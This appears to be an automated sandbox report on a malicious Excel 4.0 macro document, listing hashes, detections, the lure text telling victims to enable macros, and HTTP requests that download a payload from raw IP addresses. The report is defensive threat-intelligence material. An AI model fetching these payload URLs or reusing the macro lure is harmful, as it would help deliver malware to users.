Loading ...

Play interactive tourEdit tour

Analysis Report 9177284661-04302021.xlsm

Overview

General Information

Sample Name:9177284661-04302021.xlsm
Analysis ID:403443
MD5:a8b4e37766d35b543884d8882147eaa2
SHA1:4356c14118ea9098dabb6d9af620003b7929058a
SHA256:533c8713c4e10c223a9f8139f9d408ca326aee14a1d88382c91f2ff18cf0f93c
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Yara detected MalDoc1
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2156 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sheet3.xmlJoeSecurity_MalDoc_1Yara detected MalDoc_1Joe Security
    sharedStrings.xmlJoeSecurity_MalDoc_1Yara detected MalDoc_1Joe Security

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for domain / URLShow sources
      Source: http://185.45.193.80/44313,6048108796.datVirustotal: Detection: 6%Perma Link
      Source: http://45.144.31.232/44313,6048108796.datVirustotal: Detection: 8%Perma Link
      Multi AV Scanner detection for submitted fileShow sources
      Source: 9177284661-04302021.xlsmVirustotal: Detection: 38%Perma Link
      Source: 9177284661-04302021.xlsmReversingLabs: Detection: 31%
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

      Software Vulnerabilities:

      barindex
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.45.193.80:80
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.45.193.80:80

      Networking:

      barindex
      Yara detected MalDoc1Show sources
      Source: Yara matchFile source: sheet3.xml, type: SAMPLE
      Source: Yara matchFile source: sharedStrings.xml, type: SAMPLE
      Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.45.193.80Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.144.31.232Connection: Keep-Alive
      Source: unknownTCP traffic detected without corresponding DNS query: 185.45.193.80
      Source: unknownTCP traffic detected without corresponding DNS query: 185.45.193.80
      Source: unknownTCP traffic detected without corresponding DNS query: 185.45.193.80
      Source: unknownTCP traffic detected without corresponding DNS query: 185.45.193.80
      Source: unknownTCP traffic detected without corresponding DNS query: 82.118.21.70
      Source: unknownTCP traffic detected without corresponding DNS query: 82.118.21.70
      Source: unknownTCP traffic detected without corresponding DNS query: 82.118.21.70
      Source: unknownTCP traffic detected without corresponding DNS query: 82.118.21.70
      Source: unknownTCP traffic detected without corresponding DNS query: 82.118.21.70
      Source: unknownTCP traffic detected without corresponding DNS query: 82.118.21.70
      Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.232
      Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.232
      Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.232
      Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.232
      Source: unknownTCP traffic detected without corresponding DNS query: 185.45.193.80
      Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.232
      Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.232
      Source: unknownTCP traffic detected without corresponding DNS query: 185.45.193.80
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\307513F9.jpgJump to behavior
      Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.45.193.80Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.144.31.232Connection: Keep-Alive

      System Summary:

      barindex
      Found malicious Excel 4.0 MacroShow sources
      Source: 9177284661-04302021.xlsmInitial sample: urlmon
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above 22 0 Once you have enabled editing please click Ena
      Source: Screenshot number: 4Screenshot OCR: Enable Content button from the yellow bar above 23 24 25 26 27 28 29 30 31 32 33 34 35
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: 9177284661-04302021.xlsmInitial sample: EXEC
      Source: 9177284661-04302021.xlsmOLE, VBA macro line: Public Function Auto_Open()
      Source: 9177284661-04302021.xlsmOLE indicator, VBA macros: true
      Source: classification engineClassification label: mal84.troj.expl.evad.winXLSM@1/7@0/3
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$9177284661-04302021.xlsmJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREBA5.tmpJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: 9177284661-04302021.xlsmVirustotal: Detection: 38%
      Source: 9177284661-04302021.xlsmReversingLabs: Detection: 31%
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: 9177284661-04302021.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
      Source: 9177284661-04302021.xlsmInitial sample: OLE zip file path = xl/drawings/drawing2.xml
      Source: 9177284661-04302021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
      Source: 9177284661-04302021.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
      Source: 9177284661-04302021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsScripting22Path InterceptionPath InterceptionMasquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsExploitation for Client Execution12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting22Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      9177284661-04302021.xlsm39%VirustotalBrowse
      9177284661-04302021.xlsm32%ReversingLabsDocument-Office.Trojan.Valyria

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://185.45.193.80/44313,6048108796.dat7%VirustotalBrowse
      http://185.45.193.80/44313,6048108796.dat0%Avira URL Cloudsafe
      http://45.144.31.232/44313,6048108796.dat8%VirustotalBrowse
      http://45.144.31.232/44313,6048108796.dat0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://185.45.193.80/44313,6048108796.dattrue
      • 7%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://45.144.31.232/44313,6048108796.dattrue
      • 8%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      82.118.21.70
      unknownUkraine
      204957GREENFLOID-ASUAfalse
      45.144.31.232
      unknownUnited Kingdom
      42994HQservCommunicationSolutionsILfalse
      185.45.193.80
      unknownUnited Arab Emirates
      60117HSAEfalse

      General Information

      Joe Sandbox Version:32.0.0 Black Diamond
      Analysis ID:403443
      Start date:04.05.2021
      Start time:06:07:09
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 4m 45s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:9177284661-04302021.xlsm
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Run name:Without Instrumentation
      Number of analysed new started processes analysed:5
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal84.troj.expl.evad.winXLSM@1/7@0/3
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xlsm
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      82.118.21.709177284661-04302021.xlsmGet hashmaliciousBrowse
        45.144.31.2329177284661-04302021.xlsmGet hashmaliciousBrowse
        • 45.144.31.232/44313,6048108796.dat
        9177284661-04302021.xlsmGet hashmaliciousBrowse
        • 45.144.31.232/44313,6048108796.dat
        185.45.193.809177284661-04302021.xlsmGet hashmaliciousBrowse
        • 185.45.193.80/44313,6048108796.dat
        9177284661-04302021.xlsmGet hashmaliciousBrowse
        • 185.45.193.80/44313,6048108796.dat

        Domains

        No context

        ASN

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        GREENFLOID-ASUA9177284661-04302021.xlsmGet hashmaliciousBrowse
        • 82.118.21.70
        9177284661-04302021.xlsmGet hashmaliciousBrowse
        • 82.118.21.70
        EgW5u2WYG2.exeGet hashmaliciousBrowse
        • 45.134.255.99
        7IXb5bOTOQ.exeGet hashmaliciousBrowse
        • 45.134.255.61
        DU61r0xvZ7.exeGet hashmaliciousBrowse
        • 82.118.23.184
        TNT SHIPPING DOC 6753478364.exeGet hashmaliciousBrowse
        • 91.90.195.7
        10ba8cb2_by_Libranalysis.exeGet hashmaliciousBrowse
        • 195.123.238.191
        SThy2G7fGR.exeGet hashmaliciousBrowse
        • 45.134.255.61
        65cb803d8339bc32863bd557a882cf2016ad7945b18f3.exeGet hashmaliciousBrowse
        • 45.134.255.61
        73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
        • 45.90.59.97
        73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
        • 45.90.59.97
        73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
        • 45.90.59.97
        kVXWdr5oFQ.exeGet hashmaliciousBrowse
        • 195.123.233.63
        t.exeGet hashmaliciousBrowse
        • 195.123.237.105
        scan-remittance-slip.xlsxGet hashmaliciousBrowse
        • 82.118.23.217
        Shipping-Documents.xlsxGet hashmaliciousBrowse
        • 82.118.23.217
        Remittance Advice - MA CONSULTING.xlsxGet hashmaliciousBrowse
        • 82.118.23.217
        amCz0268Nl.exeGet hashmaliciousBrowse
        • 45.134.255.61
        Contract_372758654-1.xlsmGet hashmaliciousBrowse
        • 195.123.244.129
        Contract_372758654-1.xlsmGet hashmaliciousBrowse
        • 195.123.244.129
        HSAE9177284661-04302021.xlsmGet hashmaliciousBrowse
        • 185.45.193.80
        9177284661-04302021.xlsmGet hashmaliciousBrowse
        • 185.45.193.80
        24e5ce5d_by_Libranalysis.xlsmGet hashmaliciousBrowse
        • 185.198.57.121
        24e5ce5d_by_Libranalysis.xlsmGet hashmaliciousBrowse
        • 185.198.57.121
        24e5ce5d_by_Libranalysis.xlsmGet hashmaliciousBrowse
        • 185.198.57.121
        kVXWdr5oFQ.exeGet hashmaliciousBrowse
        • 185.183.96.36
        t.exeGet hashmaliciousBrowse
        • 185.141.27.225
        SSuPgxqQBv.exeGet hashmaliciousBrowse
        • 185.183.96.36
        sGdpcwaC54.exeGet hashmaliciousBrowse
        • 185.183.96.147
        sGdpcwaC54.exeGet hashmaliciousBrowse
        • 185.183.96.147
        ccriZ1jd8H.exeGet hashmaliciousBrowse
        • 185.183.96.147
        SecuriteInfo.com.Trojan.GenericKD.36392080.3322.exeGet hashmaliciousBrowse
        • 185.183.96.156
        0304_87496944093261.docGet hashmaliciousBrowse
        • 185.183.96.157
        0304_56958375050481.docGet hashmaliciousBrowse
        • 185.183.96.157
        Static.dllGet hashmaliciousBrowse
        • 185.183.96.157
        Static.dllGet hashmaliciousBrowse
        • 185.183.96.157
        msals.dllGet hashmaliciousBrowse
        • 185.183.96.157
        Payment_MT_103_#776363_Swift_Confirmation.exeGet hashmaliciousBrowse
        • 185.244.150.183
        0303_15995446253021.docGet hashmaliciousBrowse
        • 185.183.96.157
        Static.dllGet hashmaliciousBrowse
        • 185.183.96.157
        HQservCommunicationSolutionsIL9177284661-04302021.xlsmGet hashmaliciousBrowse
        • 45.144.31.232
        9177284661-04302021.xlsmGet hashmaliciousBrowse
        • 45.144.31.232
        73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
        • 45.144.30.80
        73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
        • 45.144.30.80
        73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
        • 45.144.30.80
        d658fc2e_by_Libranalysis.docmGet hashmaliciousBrowse
        • 45.144.29.166
        d658fc2e_by_Libranalysis.docmGet hashmaliciousBrowse
        • 45.144.29.166
        d658fc2e_by_Libranalysis.docmGet hashmaliciousBrowse
        • 45.144.29.166
        figure-04.26.2021.docGet hashmaliciousBrowse
        • 45.144.29.200
        figure-04.26.2021.docGet hashmaliciousBrowse
        • 45.144.29.200
        figure-04.26.2021.docGet hashmaliciousBrowse
        • 45.144.29.200
        Anfrage-04.14.2021.docGet hashmaliciousBrowse
        • 91.194.11.70
        Anfrage-04.14.2021.docGet hashmaliciousBrowse
        • 91.194.11.70
        Anfrage-04.14.2021.docGet hashmaliciousBrowse
        • 91.194.11.70
        CompensationClaim-1416897608-04152021.xlsmGet hashmaliciousBrowse
        • 45.144.30.16
        CompensationClaim-1416897608-04152021.xlsmGet hashmaliciousBrowse
        • 45.144.30.16
        Suspect.xlsmGet hashmaliciousBrowse
        • 45.144.30.106
        Compensation_690949256_04132021.xlsmGet hashmaliciousBrowse
        • 45.144.30.106
        Suspect.xlsmGet hashmaliciousBrowse
        • 45.144.30.106
        Compensation_690949256_04132021.xlsmGet hashmaliciousBrowse
        • 45.144.30.106

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\307513F9.jpg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:[TIFF image data, big-endian, direntries=5], baseline, precision 8, 1080x1080, frames 3
        Category:dropped
        Size (bytes):92379
        Entropy (8bit):7.654577060340879
        Encrypted:false
        SSDEEP:1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0
        MD5:4A425E6A5A885C0D0E2589506FD2244B
        SHA1:E23482422480A4720E22F311B42BD65E2F3556F8
        SHA-256:76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160
        SHA-512:3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: ......JFIF.....`.`.....ZExif..MM.*.................J............Q...........Q...........Q..........................C....................................................................C.......................................................................8.8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..D.G.\.....i].......k.@U.........B..Hw.A...`p;.RsIRHTs..%G?QU.#..$..."...U.A....g].s......c..,....{W'..M.Nc....F.~..y..l..`.e..a..[...P.y]..k_..CI..z.Ru..s.6.Y....."..1]Q......e#.......~.`sk..KH......p.4.i.j+3{.....N.DS..L.....o..o.5f>..jY.uS...Z.B...UG`)..6D....(.....
        C:\Users\user\AppData\Local\Temp\36FE0000
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):115187
        Entropy (8bit):7.679292531575217
        Encrypted:false
        SSDEEP:3072:GmklPrvKINbjvw548LMb/oqKO8NnS8+60Kco:GXlPmAbT648LM7D98Np+EV
        MD5:367124A82FB758FF6258AF0E59AE4984
        SHA1:E564A4A621945BBEF791627494B5EB9B6E3751A8
        SHA-256:3137E11555F26792D03FD0DA41051C2D14BDAD48B43D3AFE83B4DD773E460EB3
        SHA-512:9D7BCD921C9F226E96A56DA5532EA908D9B195E961DED751D4C3293598F31BFBB84D146330014E2CA369D1C84C5F28302E4E571214F68C26458B7614589CC2EC
        Malicious:false
        Reputation:low
        Preview: .U.n.0....?...".....r.y...I>.&..m.$H...K...$$@.zQ;.3\p..V.K.AYS..:"..a.2uE...._.....5P.5.r=..m..v...6."M..7cA4..@...+3.[.....q..5.....k".X.A&.[.......~.t2U..7...UE.sZ...Q.4..... .xi........VS..2.G.....rz.a..V....Xh..?P....rZ.....T..;..._.A.$....?.E..J.W..Sk..<or..%..h.-.-....>.k\.7Qg.re`.v........$.........5d..............4?{.:.&...,_?>?......B.-CFu....p..1.T.z..cw.!=.M-....}.....3..7...r.......;ap.7.B.e.N[...v......z..T]:........c.`.Nx....W.<..r.O........PK..........!.........*.......[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\9177284661-04302021.LNK
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:21 2020, mtime=Tue May 4 12:07:48 2021, atime=Tue May 4 12:07:48 2021, length=115178, window=hide
        Category:modified
        Size (bytes):2128
        Entropy (8bit):4.508132440715174
        Encrypted:false
        SSDEEP:24:8h/XT46kd2zvgHei6Dv3qfdM7dD2h/XT46kd2zvgHei6Dv3qfdM7dV:8h/XTDkd2zIHjfQh2h/XTDkd2zIHjfQ/
        MD5:DFFA4091157334F9379C1F8625BF466E
        SHA1:DFF23F9DAD76202B8D01253514E6BCB497EA86BB
        SHA-256:E22B406F66EF6059A88E5C3B56769781FFD37E6BD683A706A32FAAF0585FE189
        SHA-512:CA790643D67ECE59AE54239D668811021F5CBC6B20C764BA115D8BFB0453924018769FBE5CC980452D534617E00F23C2D3292121C70BE74F06D93D415876A19C
        Malicious:false
        Reputation:low
        Preview: L..................F.... ...6...{..].C{.@...dM{.@...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2.d....R.h .917728~1.XLS..^.......Q.y.Q.y*...8.....................9.1.7.7.2.8.4.6.6.1.-.0.4.3.0.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\688098\Users.user\Desktop\9177284661-04302021.xlsm./.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.9.1.7.7.2.8.4.6.6.1.-.0.4.3.0.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......688098..........D_..
        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue May 4 12:07:48 2021, atime=Tue May 4 12:07:48 2021, length=8192, window=hide
        Category:dropped
        Size (bytes):867
        Entropy (8bit):4.497838446554197
        Encrypted:false
        SSDEEP:12:85QYmTLgXg/XAlCPCHaXIB8kB/ZEX+WnicvbwbDtZ3YilMMEpxRljK6TdJP9TdJ2:85QB/XT46ksYegDv3qfrNru/
        MD5:4A5D1CA67C8F7DD86F9537341DFF7FB6
        SHA1:48A579342370E5587F0B882734E7F559AD757B04
        SHA-256:3C0A8B4B90B2BFFC956C08EB9669552E0AC4FAC437F1683F530A6679E10AD514
        SHA-512:09F94DFFA40355CCA95D649D136498AA8C90C12B1780D40B9076D78F062421D02E956B83794C3F36532A70EFD030DFBFC0866D1EC77A4D2068DFE8D58EE47E93
        Malicious:false
        Reputation:low
        Preview: L..................F...........7G..].C{.@..].C{.@... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.h..Desktop.d......QK.X.R.h*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\688098\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......688098..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):112
        Entropy (8bit):4.517286360501819
        Encrypted:false
        SSDEEP:3:oyBVomxW7SNRfRg9rlNRfRg9rlmxW7SNRfRg9rlv:djQc2pZ2pZc2p1
        MD5:3C738600E2C168DA464E5F6B8D1F5BFE
        SHA1:B8A71D217EFB558FAAA522D9F116879690781851
        SHA-256:B426222C318FCE644598521ECE3647859958E71F0B282931B26E02193B2BC4E0
        SHA-512:4E9DA68D7BA28E7FD8B14F57CD85CE1BECDD1DE65C95E35976DCB98C57F6105ED51553D016BEAC78892A57F318E4A47D314A368C13AFC45F176E18836BAB44C0
        Malicious:false
        Reputation:low
        Preview: Desktop.LNK=0..[misc]..9177284661-04302021.LNK=0..9177284661-04302021.LNK=0..[misc]..9177284661-04302021.LNK=0..
        C:\Users\user\Desktop\27FE0000
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):115178
        Entropy (8bit):7.678968868760752
        Encrypted:false
        SSDEEP:3072:GmkVMarvKINbjvw548LMb/oqKO8NnS8+60Kcd:GXVMamAbT648LM7D98Np+Eg
        MD5:5029202D94871712FACF97B7D903C7AC
        SHA1:027869644EAEFD731271C79B74CF56A1946DA0BE
        SHA-256:7715EF04371DA547D7B093A17659468A166566B723B7D2CFC986DEDDA3F80DCC
        SHA-512:29E24F14E911A20D2D5202FA5933AEEE73951B8C3CB94EE27F7636815477F05E22F8A7E08D6C5BDE4851B1FD40A30EE3C9C072E7BF22B04F1C0BCF378CAA2DF9
